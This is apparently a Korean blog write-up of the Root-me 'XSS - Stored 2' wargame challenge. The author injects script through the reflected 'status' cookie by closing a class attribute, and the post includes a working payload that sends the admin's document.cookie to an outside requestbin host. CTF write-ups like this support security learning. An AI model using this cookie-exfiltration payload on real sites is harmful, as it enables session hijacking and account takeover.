ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • XSS - Stored 2
    Wargame/Root-me = Web - Client 2022. 11. 9. 20:29

    XSS - Stored 2

    문제 설명을 살펴보면

    관리자 세션 쿠키를 탈취하여 관리자 구역에 접근하라 한다.

     

    우선 Message에 스크립트 문을 입력해보면

    실행되지 않는다.

    아래 부분에 Message 입력값이 그대로 출력되는 것으로 보아 단순히 문자열로 받는 것 같다.

     

    쿠키 값을 한 번 살펴보면

    status 쿠키에 invite라는 값을 가지고 있다.

    invite를 admin으로 변경해보면

    우측 상단의 Status와 아래 부분 status가 admin으로 바뀐 것을 확인할 수 있다.

    status 쿠키의 값을 스크립트문으로 해 보면

    실행이 되지 않는다.

     

    저 부분의 소스코드를 살펴보면

    class에도 똑같이 들어가는 것을 볼 수 있다.

    따라서, ">로 닫아주고 해보면

    class가 닫히고 스크립트 문이 실행되게 된다.

     

    이를 이용하여 관리자의 쿠키를 탈취하면 된다.

    "><script>document.write('<img src=\"http://requestbin.io/155onho1?cookie='+document.cookie+'\"')</script>

     

    Burp Suiter를 이용해 위와 같이 쿠키 값을 설정하여 보내면

    관리자의 쿠키를 획득할 수 있다.

     

    그리고 관리자의 구역에 접근하라 했으니, 페이지 좌측 상단의 admin으로 접근할 때

    Burp Suite를 이용해 쿠키의 값을 아래와 같이 주게 되면

     

    flag를 획득할 수 있다.

    'Wargame > Root-me = Web - Client' 카테고리의 다른 글

    XSS DOM Based - Filters Bypass  (0) 2022.11.14
    XSS DOM Based - Introduction  (0) 2022.11.08
    <Root-me> Install files  (0) 2022.01.05
    <Root-me> XSS - Stored 1  (0) 2022.01.04
    <Root-me> CSRF - 0 protection  (0) 2021.12.24
Designed by Tistory.